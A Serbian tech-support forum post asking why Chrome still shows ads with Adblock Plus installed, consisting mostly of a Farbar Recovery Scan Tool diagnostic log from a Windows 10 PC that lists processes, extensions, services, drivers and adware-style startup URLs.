Chrome izbacuje reklame pored instaliranog ADBLOCK Plus-a

2

Chrome izbacuje reklame pored instaliranog ADBLOCK Plus-a

offline
  • u administraciji
  • Pridružio: 16 Okt 2010
  • Poruke: 3468
  • Gde živiš: KRAGUJEVAC

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 20-08-2017
Ran by dejan (administrator) on DEJAN-PC (27-08-2017 16:21:46)
Running from C:\Users\dejan\Desktop
Loaded Profiles: dejan (Available Profiles: dejan)
Platform: Microsoft Windows 10 Pro Version 1703 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgcsrvx.exe
(Adobe Systems, Incorporated) C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avgsvcx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgwdsvcx.exe
(Digital Wave Ltd.) C:\Program Files\Common Files\DVDVideoSoft\lib\app_updater.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(Popcorn Time) C:\Program Files\Popcorn Time\Updater.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgnsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgemcx.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Copyright 2017.) C:\Program Files\Zemana AntiMalware\ZAM.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avguix.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgui.exe
(Facebook) C:\Users\dejan\AppData\Local\Facebook\Games\FacebookGameroom.exe
(The CefSharp Authors) C:\Users\dejan\AppData\Local\Facebook\Games\Facebook Gameroom Browser.exe
(Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [485280 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [15111680 2017-02-10] (Realtek Semiconductor)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [587288 2017-03-15] (Oracle Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [AvgUi] => C:\Program Files\AVG\Framework\Common\avguirnx.exe [220944 2016-12-06] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\Framework\Common\avguirnx.exe [220944 2016-12-06] (AVG Technologies CZ, s.r.o.)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [Viber] => C:\Users\dejan\AppData\Local\Viber\Viber.exe [30676560 2017-05-06] (Viber Media S.à r.l.)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [7658200 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [IDMan] => C:\Program Files\Internet Download Manager\IDMan.exe [4005944 2017-02-14] (Tonec Inc.)
Startup: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2017-08-26]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\dejan\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{938526f2-0a05-4077-a0e9-c9636044b755}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{938526f2-0a05-4077-a0e9-c9636044b755}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{df927024-ee76-41e9-bec0-c7ce2732a227}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{df927024-ee76-41e9-bec0-c7ce2732a227}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files\Internet Download Manager\IDMIECC.dll [2016-12-10] (Internet Download Manager, Tonec Inc.)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_131\bin\ssv.dll [2017-04-24] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-04-24] (Oracle Corporation)

Edge:
======
Edge HomeButtonPage: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> about:start

FireFox:
========
FF ProfilePath: C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467 [2017-08-27]
FF Homepage: Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467 -> www.google.com
FF Extension: (Vlc context menu) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\vlcplaylist@helgatauscher.de.xpi [2017-05-28]
FF Extension: (VideoDownloadConverter) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\_4zMembers_@www.videodownloadconverter.com [2017-08-21]
FF Extension: (Video DownloadHelper) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-08-21]
FF Extension: (Adblock Plus) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-08-21]
FF Extension: (Firefox Screenshots) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\features\{48b193db-8667-41f3-b793-94688160f06f}\screenshots@mozilla.org.xpi [2017-08-27]
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files\Internet Download Manager\idmmzcc2.xpi [2017-01-26]
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\dejan\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\dejan\AppData\Roaming\IDM\idmmzcc5 [2017-08-25] [not signed]
FF Plugin: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-04-24] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-04-24] (Oracle Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)

Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.google.com/
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.google.com/","hxxp://www.youndoo.com/?z=61bcc231723f316e9912186g2z5b6teo2w2zazczaq&from=amz&uid=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&type=hp","hxxp://www.search.ask.com/?o=APN10640A&gct=hp&d=473-102&v=a12627-333&t=4","hxxp://www.initialsite123.com/?z=53e8deaf6335b4feab6622eg8z8t0g5mbw7q9b8w6o&from=icb&uid=HitachiXHDS721050CLA362_JPF521HA3EJ06V3EJ06VX&type=hp"
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-27] <==== ATTENTION
CHR Extension: (Google Translate) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-25]
CHR Extension: (Nice Day (weather)) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\akmijnhpfgblhkbdlnbldpmjgaiognoo [2017-08-25]
CHR Extension: (Google Docs) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-25]
CHR Extension: (Google Drive) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-25]
CHR Extension: (YouTube) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-25]
CHR Extension: (Adblock Plus) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-08-25]
CHR Extension: (Notifier for Gmail™) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\dcjichoefijpinlfnjghokpkojhlhkgl [2017-08-25]
CHR Extension: (SBRO Safe Browsing) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\eglegmheckaainhhlaiogafaecfgfbga [2017-08-25]
CHR Extension: (Tampermonkey BETA) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\gcalenpjmijncebpfijmoaglllgpjagf [2017-08-25]
CHR Extension: (Google Docs Offline) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-25]
CHR Extension: (Image Search Options) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\kljmejbpilkadikecejccebmccagifhl [2017-08-25]
CHR Extension: (IDM Integration Module) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2017-08-25]
CHR Extension: (Chrome Web Store Payments) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-25]
CHR Extension: (Chrome NPAPI Replacement) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\okoafaojkokbmieeefnflkiklhanpeoc [2017-08-25]
CHR Extension: (Gmail) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-25]
CHR Extension: (Chrome Media Router) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-25]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files\Internet Download Manager\IDMGCExt.crx [2017-02-13]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AGSService; C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S3 AvgAMPS; C:\Program Files\AVG\Av\avgamps.exe [1002544 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 avgfws; C:\Program Files\AVG\Av\avgfws.exe [1458352 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files\AVG\Av\avgidsagent.exe [4153400 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 avgsvc; C:\Program Files\AVG\Framework\Common\avgsvcx.exe [935184 2016-12-06] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\Av\avgwdsvcx.exe [606352 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 DigitalWave.Update.Service; C:\Program Files\Common Files\DVDVideoSoft\lib\app_updater.exe [392168 2016-08-31] (Digital Wave Ltd.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2545848 2017-03-18] (Microsoft Corporation)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [10883824 2017-03-17] (TeamViewer GmbH)
R2 Update service; C:\Program Files\Popcorn Time\Updater.exe [339968 2016-08-26] (Popcorn Time) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [265352 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [82488 2017-06-20] (Microsoft Corporation)
R2 ZAMSvc; C:\Program Files\Zemana AntiMalware\ZAM.exe [14554768 2017-04-29] (Copyright 2017.)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AndnetBus; C:\WINDOWS\System32\drivers\lgandnetbus.sys [15744 2014-10-09] (LG Electronics Inc.)
S3 AndNetDiag; C:\WINDOWS\system32\DRIVERS\lgandnetdiag.sys [23680 2014-10-09] (LG Electronics Inc.)
S3 ANDNetModem; C:\WINDOWS\system32\DRIVERS\lgandnetmodem.sys [28416 2014-10-09] (LG Electronics Inc.)
S0 Avgbootx; C:\WINDOWS\System32\DRIVERS\avgbootx.sys [19584 2016-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [134912 2016-05-13] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\WINDOWS\system32\DRIVERS\avgfwd6x.sys [67336 2016-10-23] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\WINDOWS\System32\DRIVERS\avgidsdriverx.sys [259328 2017-03-23] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [207616 2016-10-05] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\WINDOWS\system32\DRIVERS\avgidsshimw8x.sys [41216 2016-08-02] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [244992 2016-11-30] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [287008 2016-02-16] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [197376 2017-04-11] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [47360 2016-06-01] (AVG Technologies CZ, s.r.o.)
R0 avgunivx; C:\WINDOWS\System32\DRIVERS\avgunivx.sys [65280 2016-06-20] (AVG Technologies CZ, s.r.o.)
R1 Avgwfpx; C:\WINDOWS\system32\DRIVERS\avgwfpx.sys [246536 2016-08-04] (AVG Technologies CZ, s.r.o.)
S3 dg_ksudbus; C:\WINDOWS\System32\drivers\ksudbus.sys [75776 2011-03-25] (Microsoft Corporation) [File not signed]
S3 HtcUsbMdmV32; C:\WINDOWS\system32\DRIVERS\HtcUsbMdmV32.sys [105984 2009-10-27] (QUALCOMM Incorporated)
R1 lnvguard; C:\WINDOWS\System32\DRIVERS\lnvguard.sys [83392 2016-12-01] (Huorong Borui (Beijing) Technology Co., Ltd.)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [170200 2017-08-08] (Malwarebytes)
S3 pneteth; C:\WINDOWS\System32\drivers\pneteth.sys [13440 2011-11-25] (June Fabrics Technology Inc.)
R0 pwdrvio; C:\WINDOWS\System32\pwdrvio.sys [17160 2015-03-05] ()
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [13064 2016-11-24] ()
S3 qcfilter; C:\WINDOWS\System32\drivers\qcusbfilter.sys [39456 2015-09-25] (QUALCOMM Incorporated)
S3 qcusbser; C:\WINDOWS\system32\DRIVERS\qcusbser.sys [214560 2015-09-25] (QUALCOMM Incorporated)
R3 rt640x86; C:\WINDOWS\System32\drivers\rt640x86.sys [795648 2017-02-20] (Realtek )
S3 usbbus; C:\WINDOWS\System32\drivers\lgusbbus.sys [13056 2014-05-27] (LG Electronics Inc.)
S3 UsbDiag; C:\WINDOWS\system32\DRIVERS\lgusbdiag.sys [20864 2014-05-27] (LG Electronics Inc.)
S3 USBModem; C:\WINDOWS\system32\DRIVERS\lgusbmodem.sys [25216 2014-05-27] (LG Electronics Inc.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [37464 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [243104 2017-03-18] (Microsoft Corporation)
S3 wdf_usb; C:\WINDOWS\system32\drivers\usb2ser.sys [128704 2016-08-16] (MBB)
S3 wdm_usb; C:\WINDOWS\System32\drivers\usb2ser.sys [128704 2016-08-16] (MBB)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [96672 2017-03-18] (Microsoft Corporation)
S3 WUDFWpdMtp; C:\WINDOWS\System32\drivers\WUDFRd.sys [160256 2017-03-18] (Microsoft Corporation)
R1 ZAM; C:\WINDOWS\System32\drivers\zam32.sys [181496 2016-10-15] (Zemana Ltd.)
R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard32.sys [181496 2016-10-15] (Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-08-27 16:21 - 2017-08-27 16:22 - 000018120 _____ C:\Users\dejan\Desktop\FRST.txt
2017-08-27 16:21 - 2017-08-27 16:21 - 000000258 _____ C:\Users\dejan\Desktop\Fixlog.txt
2017-08-26 23:52 - 2017-08-26 23:52 - 000001227 _____ C:\Users\dejan\Desktop\Facebook Gameroom.lnk
2017-08-26 23:52 - 2017-08-26 23:52 - 000000000 ____D C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Facebook
2017-08-23 23:16 - 2017-08-23 23:16 - 001792512 _____ (Farbar) C:\Users\dejan\Desktop\FRST.exe
2017-08-21 21:37 - 2017-08-27 16:21 - 000000000 ____D C:\FRST
2017-08-13 22:40 - 2017-08-13 22:40 - 000260776 _____ (Facebook) C:\Users\dejan\Downloads\FacebookGameroom.exe
2017-08-09 22:03 - 2017-08-01 04:47 - 005862816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-08-09 22:03 - 2017-08-01 04:43 - 000273312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-08-09 22:03 - 2017-08-01 04:41 - 000095648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-08-09 22:03 - 2017-08-01 04:38 - 000406544 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-08-09 22:03 - 2017-08-01 04:37 - 002023832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-08-09 22:03 - 2017-08-01 04:37 - 000582560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-08-09 22:03 - 2017-08-01 04:36 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-08-09 22:03 - 2017-08-01 04:36 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-08-09 22:03 - 2017-08-01 04:36 - 000173984 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-08-09 22:03 - 2017-08-01 04:35 - 000280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2017-08-09 22:03 - 2017-08-01 04:35 - 000133904 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2017-08-09 22:03 - 2017-08-01 04:34 - 000610584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000359552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000168864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2017-08-09 22:03 - 2017-08-01 04:31 - 000176024 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-08-09 22:03 - 2017-08-01 04:20 - 002956288 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-08-09 22:03 - 2017-08-01 04:18 - 013841408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-08-09 22:03 - 2017-08-01 04:18 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-08-09 22:03 - 2017-08-01 04:17 - 000034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\tokenbinding.dll
2017-08-09 22:03 - 2017-08-01 04:16 - 000080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-08-09 22:03 - 2017-08-01 04:14 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscore.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 020504064 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 000121344 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2017-08-09 22:03 - 2017-08-01 04:12 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-08-09 22:03 - 2017-08-01 04:12 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-08-09 22:03 - 2017-08-01 04:11 - 000187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-08-09 22:03 - 2017-08-01 04:10 - 000905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-08-09 22:03 - 2017-08-01 04:10 - 000358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-08-09 22:03 - 2017-08-01 04:08 - 000267264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncryptprov.dll
2017-08-09 22:03 - 2017-08-01 04:08 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 011870208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 005961728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 003447296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 001585152 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-08-09 22:03 - 2017-08-01 04:06 - 001087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 000798208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 000236032 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvsvc.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 006269440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 001831936 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-08-09 22:03 - 2017-08-01 04:03 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-08-09 22:03 - 2017-08-01 04:01 - 000547328 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-08-09 22:03 - 2017-08-01 04:01 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-08-09 22:03 - 2017-08-01 00:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjet40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswdat10.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswstr10.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000616448 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrepl40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000518144 _____ C:\WINDOWS\system32\msjetoledb40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxbde40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspbde40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrd3x40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000339968 _____ (Microsoft Corporation) C:\WINDOWS\system32\msexcl40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrd2x40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjtes40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstext40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\msltus40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjint40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjter40.dll
2017-08-09 22:02 - 2017-08-01 04:34 - 000060312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmcl.sys
